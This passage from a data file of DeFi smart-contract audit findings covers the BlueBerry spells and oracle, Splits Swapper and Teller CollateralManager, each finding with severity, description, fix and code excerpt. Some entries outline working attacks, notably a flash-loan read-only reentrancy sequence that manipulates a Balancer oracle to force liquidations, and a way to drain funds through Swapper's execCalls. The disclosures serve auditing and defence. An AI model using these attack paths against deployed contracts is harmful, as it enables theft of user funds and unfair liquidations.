swap\\n```\\n\\nBecause swapToken == borrowToken if there is ever a swap then the swapToken balance will decrease. This causes L89 to always revert when a swap happens, making the contract completely non-functionalчRemove checkчShortLongSpell is nonfunctionalч```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n -ShortLongSpell#openPosition can cause user unexpected liquidation when increasing position sizeчhighчWhen increasing a position, all collateral is sent to the user rather than being kept in the position. This can cause serious issues because this collateral keeps the user from being liquidated. It may unexpectedly leave the user on the brink of liquidation where a small change in price leads to their liquidation.\\nShortLongSpell.sol#L129-L141\\n```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n\\nIn the above lines we can see that all collateral is burned and the user is sent the underlying tokens. This is problematic as it sends all the collateral to the user, leaving the position collateralized by only the isolated collateral.\\nBest case the user's transaction reverts but worst case they will be liquidated almost immediately.чDon't burn the collateralчUnfair liquidation for usersч```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n -Pending CRV rewards are not accounted for and can cause unfair liquidationsчhighчpendingRewards are factored into the health of a position so that the position collateral is fairly assessed. However WCurveGauge#pendingRewards doesn't return the proper reward tokens/amounts meaning that positions aren't valued correctly and users can be unfairly liquidated.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nWhen BlueBerryBank is valuing a position it also values the pending rewards since they also have value.\\nWCurveGauge.sol#L106-L114\\n```\\nfunction pendingRewards(\\n uint256 tokenId,\\n uint256 amount\\n)\\n public\\n view\\n override\\n returns (address[] memory tokens, uint256[] memory rewards)\\n{}\\n```\\n\\nAbove we see that WCurveGauge#pendingRewards returns empty arrays when called. This means that pending rewards are not factored in correctly and users can be liquidated when even when they should be safe.чChange WCurveGauge#pendingRewards to correctly return the pending rewardsчUser is liquidated when they shouldn't beч```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n -`BalancerPairOracle` can be manipulated using read-only reentrancyчhighч`BalancerPairOracle.getPrice` makes an external call to `BalancerVault.getPoolTokens` without checking the Balancer Vault's reentrancy guard. As a result, the oracle can be trivially manipulated to liquidate user positions prematurely.\\nIn February, the Balancer team disclosed a read-only reentrancy vulnerability in the Balancer Vault. The detailed disclosure can be found here. In short, all Balancer pools are susceptible to manipulation of their external queries, and all integrations must now take an extra step of precaution when consuming data. Via reentrancy, an attacker can force token balances and BPT supply to be out of sync, creating very inaccurate BPT prices.\\nSome protocols, such as Sentiment, remained unaware of this issue for a few months and were later hacked as a result.\\n`BalancerPairOracle.getPrice` makes a price calculation of the form `f(balances) / pool.totalSupply()`, so it is clearly vulnerable to synchronization issues between the two data points. A rough outline of the attack might look like this:\\n```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\nчThe Balancer team recommends utilizing their official library to safeguard queries such as `Vault.getPoolTokens`. However, the library makes a state-modifying call to the Balancer Vault, so it is not suitable for `view` functions such as `BalancerPairOracle.getPrice`. There are then two options:\\nInvoke the library somewhere else. Perhaps insert a hook into critical system functions like `BlueBerryBank.liquidate`.\\nAdapt a slightly different read-only solution that checks the Balancer Vault's reentrancy guard without actually entering.чUsers choosing Balancer pool positions (such as Aura vaults) as collateral can be prematurely liquidated due to unreliable price data.ч```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\n -Deadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executedчhighчDeadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executed\\nIn the current implementation in CurveSpell.sol\\n```\\n{\\n // 2. Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n\\nthe deadline check is set to type(uint256).max, which means the deadline check is disabled!\\nIn IChiSpell. the swap is directedly call on the pool instead of the router\\n```\\nSWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n);\\n```\\n\\nand it has no deadline check for the transaction when swappingчWe recommend the protocol use block.timstamp for swapping deadline for Uniswap V2 and swap with Unsiwap Router V3 instead of the pool directly!чAMMs provide their users with an option to limit the execution of their pending actions, such as swaps or adding and removing liquidity. The most common solution is to include a deadline timestamp as a parameter (for example see Uniswap V2 and Uniswap V3). If such an option is not present, users can unknowingly perform bad trades:\\nAlice wants to swap 100 tokens for 1 ETH and later sell the 1 ETH for 1000 DAI.\\nThe transaction is submitted to the mempool, however, Alice chose a transaction fee that is too low for miners to be interested in including her transaction in a block. The transaction stays pending in the mempool for extended periods, which could be hours, days, weeks, or even longer.\\nWhen the average gas fee dropped far enough for Alice's transaction to become interesting again for miners to include it, her swap will be executed. In the meantime, the price of ETH could have drastically changed. She will still get 1 ETH but the DAI value of that output might be significantly lower.\\nShe has unknowingly performed a bad trade due to the pending transaction she forgot about.\\nAn even worse way this issue can be maliciously exploited is through MEV:\\nThe swap transaction is still pending in the mempool. Average fees are still too high for miners to be interested in it.\\nThe price of tokens has gone up significantly since the transaction was signed, meaning Alice would receive a lot more ETH when the swap is executed. But that also means that her maximum slippage value (sqrtPriceLimitX96 and minOut in terms of the Spell contracts) is outdated and would allow for significant slippage.\\nA MEV bot detects the pending transaction. Since the outdated maximum slippage value now allows for high slippage, the bot sandwiches Alice, resulting in significant profit for the bot and significant loss for Alice.ч```\\n{\\n // 2. Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n -AuraSpell openPositionFarm does not join poolчmediumчThe function to open a position for the AuraSpell does not join the pool due to wrong conditional check.\\nThe function deposits collateral into the bank, borrow tokens, and attempts to join the pool:\\n```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n \"\",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n\\nThe function only borrowed one type of tokens from the bank so the contract only owns one type of token. As a result one of the `maxAmountsIn` value is 0. Either `poolAmountFromA` or `poolAmountFromB` is 0 as a result of computation. `poolAmountOut` is the minimal value of `poolAmountFromA` and `poolAmountFromB`, it is 0. The following check `if (poolAmountOut > 0)` will always fail and the pool will never be joined.чIt is hard to tell the intent of the developer from this check. Maybe the issue is simply that `poolAmountOut` should be the sum or the max value out of `poolAmountFromA` and `poolAmountFromB` instead of the min.чThe rest of the function proceeds correctly without reverting. Users will think they joined the pool and are earning reward while they are not earning anything. This is a loss of funds to the user.ч```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n \"\",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n -The protocol will not be able to add liquidity on the curve with another token with a balance.чmediumчThe `CurveSpell` protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\nThe `openPositionFarm()` function enables user to open a leveraged position in a yield farming strategy by borrowing funds and using them to add liquidity to a Curve pool, while also taking into account certain risk management parameters such as maximum LTV and position size. When add liquidity on curve ,the protocol use the borrowed token and the collateral token, it checks the number of tokens in the pool and creates an array of the supplied token amounts to be passed to the add_liquidity function. Then the curve will transfer the tokens from the protocol and mint lp tokens to the protocol. However, the protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\n```\\n // 3. Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\nчAllow the curve pool to spend tokens that have a balance in the protocol to add liquidityчThe protocol will not be able to add liquidity on the curve with another token with a balance.ч```\\n // 3. Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\n -`getPositionRisk()` will return a wrong value of riskчmediumчIn order to interact with SPELL the users need to `lend()` some collateral which is known as Isolated Collateral and the SoftVault will deposit them into Compound protocol to generate some lending interest (to earn passive yield)\\nto liquidate a position this function `isLiquidatable()` should return `true`\\n```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n\\nand it is subcall to `getPositionRisk()`\\n```\\n function getPositionRisk(\\n uint256 positionId\\n ) public view returns (uint256 risk) {\\n uint256 pv = getPositionValue(positionId); \\n uint256 ov = getDebtValue(positionId); \\n uint256 cv = getIsolatedCollateralValue(positionId);\\n\\n if (\\n (cv == 0 && pv == 0 && ov == 0) || pv >= ov // Closed position or Overcollateralized position\\n ) {\\n risk = 0;\\n } else if (cv == 0) {\\n // Sth bad happened to isolated underlying token\\n risk = Constants.DENOMINATOR;\\n } else {\\n risk = ((ov - pv) * Constants.DENOMINATOR) / cv;\\n }\\n }\\n```\\n\\nas we can see the `cv` is a critical value in terms of the calculation of `risk` the `cv` is returned by `getIsolatedCollateralValue()`\\n```\\n function getIsolatedCollateralValue(\\n uint256 positionId\\n ) public view override returns (uint256 icollValue) {\\n Position memory pos = positions[positionId];\\n // NOTE: exchangeRateStored has 18 decimals.\\n uint256 underlyingAmount;\\n if (_isSoftVault(pos.underlyingToken)) {\\n underlyingAmount = \\n (ICErc20(banks[pos.debtToken].bToken).exchangeRateStored() * \\n pos.underlyingVaultShare) /\\n Constants.PRICE_PRECISION; \\n } else {\\n underlyingAmount = pos.underlyingVaultShare;\\n }\\n icollValue = oracle.getTokenValue(\\n pos.underlyingToken,\\n underlyingAmount\\n );\\n }\\n```\\n\\nand it uses `exchangeRateStored()` to ask Compound (CToken.sol) for the exchange rate from `CToken` contract\\n```\\nThis function does not accrue interest before calculating the exchange rate\\n```\\n\\nso the `getPositionRisk()` will return a wrong value of risk because the interest does not accrue for this positionчYou shoud use `exchangeRateCurrent()` to Accrue interest first.чthe user (position) could get liquidated even if his position is still healthyч```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n -BlueBerryBank#getPositionValue causes DOS if reward token is added that doens't have an oracleчmediumчcollToken.pendingRewards pulls the most recent reward list from Aura/Convex. In the event that reward tokens are added to pools that don't currently have an oracle then it will DOS every action (repaying, liquidating, etc.). While this is only temporary it prevents liquidation which is a key process that should have 100% uptime otherwise the protocol could easily be left with bad debt.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nUsing the pendingRewards method pulls a fresh list of all tokens. When a token is added as a reward but can't be priced then the call to getTokenValue will revert. Since getPostionValue is used in liquidations, it temporarily breaks liquidations which in a volatile market can cause bad debt to accumulate.чReturn zero valuation if extra reward token can't be priced.чTemporary DOS to liquidations which can result in bad debtч```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n -asking for the wrong address for `balanceOf()`чmediumчShortLongSpell.openPosition() pass to `_doPutCollateral()` wrong value of `balanceOf()`\\n```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nthe balance should be of `address(vault)`ч```\\n // 5. Put collateral // Remove the line below\\n strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n// Remove the line below\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n// Remove the line below\\n address(this)\\n// Add the line below\\n IERC20Upgradeable(vault).balanceOf(address(this))\\n )\\n );\\n```\\nч`openPosition()` will never workч```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n -AuraSpell#closePositionFarm requires users to swap all reward tokens through same routerчmediumчAuraSpell#closePositionFarm requires users to swap all reward tokens through same router. This is problematic as it is very unlikely that a UniswapV2 router will have good liquidity sources for all tokens and will result in users experiencing forced losses to their reward token.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAll tokens are forcibly swapped through a single router.чIssue AuraSpell#closePositionFarm requires users to swap all reward tokens through same router\\nAllow users to use an aggregator like paraswap or multiple routers instead of only one single UniswapV2 router.чUsers will be forced to swap through a router even if it doesn't have good liquidity for all tokensч```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n -rewardTokens removed from WAuraPool/WConvexPools will be lost foreverчmediumчpendingRewards pulls a fresh count of reward tokens each time it is called. This is problematic if reward tokens are ever removed from the the underlying Aura/Convex pools because it means that they will no longer be distributed and will be locked in the contract forever.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\nIn the lines above we can see that only tokens that are currently available on the pool. This means that if tokens are removed then they are no longer claimable and will be lost to those entitled to shares.чReward tokens should be stored with the tokenID so that it can still be paid out even if it the extra rewardToken is removed.чUsers will lose reward tokens if they are removedч```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n -SwapperCallbackValidation doesn't do anything, opens up users to having contracts drainedчmediumчThe `SwapperCallbackValidation` library that is intended to be used by contracts performing swaps does not provide any protection. As a result, all functions intended to be used only in a callback setting can be called any time by any user. In the provided example of how they expect this library to be used, this would result in the opportunity for all funds to be stolen.\\nThe `SwapperCallbackValidation` library is intended to be used by developers to verify that their contracts are only called in a valid, swapper callback scenario. It contains the following function to be implemented:\\n```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n\\nThis function simply pings the `SwapperFactory` and confirms that the function call is coming from a verified swapper. If it is, we assume that it is from a legitimate callback.\\nFor an example of how this is used, see the (out of scope) UniV3Swap contract, which serves as a model for developers to build contracts to support Swappers.\\n```\\nSwapperImpl swapper = SwapperImpl(msg.sender);\\nif (!swapperFactory.verifyCallback(swapper)) {\\n revert Unauthorized();\\n}\\n```\\n\\nThe contract goes on to perform swaps (which can be skipped by passing empty exactInputParams), and then sends all its ETH (or ERC20s) to `msg.sender`. Clearly, this validation is very important to protect such a contract from losing funds.\\nHowever, if we look deeper, we can see that this validation is not nearly sufficient.\\nIn fact, `SwapperImpl` inherits from `WalletImpl`, which contains the following function:\\n```\\nfunction execCalls(Call[] calldata calls_)\\n external\\n payable\\n onlyOwner\\n returns (uint256 blockNumber, bytes[] memory returnData)\\n{\\n blockNumber = block.number;\\n uint256 length = calls_.length;\\n returnData = new bytes[](length);\\n\\n bool success;\\n for (uint256 i; i < length;) {\\n Call calldata calli = calls_[i];\\n (success, returnData[i]) = calli.to.call{value: calli.value}(calli.data);\\n require(success, string(returnData[i]));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n emit ExecCalls(calls_);\\n}\\n```\\n\\nThis function allows the owner of the Swapper to perform arbitrary calls on its behalf.\\nSince the verification only checks that the caller is, in fact, a Swapper, it is possible for any user to create a Swapper and pass arbitrary calldata into this `execCalls()` function, performing any transaction they would like and passing the `verifyCallback()` check.\\nIn the generic case, this makes the `verifyCallback()` function useless, as any calldata that could be called without that function could similarly be called by deploying a Swapper and sending identical calldata through that Swapper.\\nIn the specific case based on the example provided, this would allow a user to deploy a Swapper, call the `swapperFlashCallback()` function directly (not as a callback), and steal all the funds held by the contract.чIssue SwapperCallbackValidation doesn't do anything, opens up users to having contracts drained\\nI do not believe that Swappers require the ability to execute arbitrary calls, so should not inherit from WalletImpl.\\nAlternatively, the verification checks performed by contracts accepting callbacks should be more substantial — specifically, they should store the Swapper they are interacting with's address for the duration of the transaction, and only allow callbacks from that specific address.чAll funds can be stolen from any contracts using the `SwapperCallbackValidation` library, because the `verifyCallback()` function provides no protection.ч```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n -Swapper mechanism cannot incentivize ETH-WETH swaps without risking owner fundsчmediumчWhen `flash()` is called on the Swapper contract, pairs of tokens are passed in consisting of (a) a base token, which is currently held by the contract and (b) a quote token, which is the `$tokenToBeneficiary` that the owner would like to receive.\\nThese pairs are passed to the oracle to get the quoted value of each of them:\\n```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n\\nThe `UniV3OracleImpl.sol` contract returns a quote per pair of tokens. However, since Uniswap pools only consist of WETH (not ETH) and are ordered by token address, it performs two conversions first: `_convert()` converts ETH to WETH for both base and quote tokens, and `_sort()` orders the pairs by token address.\\n```\\nConvertedQuotePair memory cqp = quoteParams_.quotePair._convert(_convertToken);\\nSortedConvertedQuotePair memory scqp = cqp._sort();\\n```\\n\\nThe oracle goes on to check for pair overrides, and gets the `scaledOfferFactor` for the pair being quoted:\\n```\\nPairOverride memory po = _getPairOverride(scqp);\\nif (po.scaledOfferFactor == 0) {\\n po.scaledOfferFactor = $defaultScaledOfferFactor;\\n}\\n```\\n\\nThe `scaledOfferFactor` is the discount being offered through the Swapper to perform the swap. The assumption is that this will be set to a moderate amount (approximately 5%) to incentivize bots to perform the swaps, but will be overridden with a value of ~0% for the same tokens, to ensure that bots aren't paid for swaps they don't need to perform.\\nThe problem is that these overrides are set on the `scqp` (sorted, converted tokens), not the actual token addresses. For this reason, ETH and WETH are considered identical in terms of overrides.\\nTherefore, Swapper owners who want to be paid out in ETH (ie where $tokenToBeneficiary = ETH) have two options:\\nThey can set the WETH-WETH override to 0%, which successfully stops bots from earning a fee on ETH-ETH trades, but will not provide any incentive for bots to swap WETH in the swapper into ETH. This makes the Swapper useless for WETH.\\nThey can keep the WETH-WETH pair at the original ~5%, which will incentivize WETH-ETH swaps, but will also pay 5% to bots for doing nothing when they take ETH out of the contract and return ETH. This makes the Swapper waste user funds.\\nThe same issues exist going in the other direction, when `$tokenToBeneficiary = WETH`.чThe `scaledOfferFactor` (along with its overrides) should be stored on the Swapper, not on the Oracle.\\nIn order to keep the system modular and logically organized, the Oracle should always return the accurate price for the `scqp`. Then, it is the job of the Swapper to determine what discount is offered for which asset.\\nThis will allow values to be stored in the actual `base` and `quote` assets being used, and not in their converted, sorted counterparts.чUsers who want to be paid out in ETH or WETH will be forced to either (a) have the Swapper not function properly for a key pair or (b) pay bots to perform useless actions.ч```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n -CollateralManager#commitCollateral can be called on an active loanчhighчCollateralManager#commitCollateral never checks if the loan has been accepted allowing users to add collaterals after which can DOS the loan.\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, 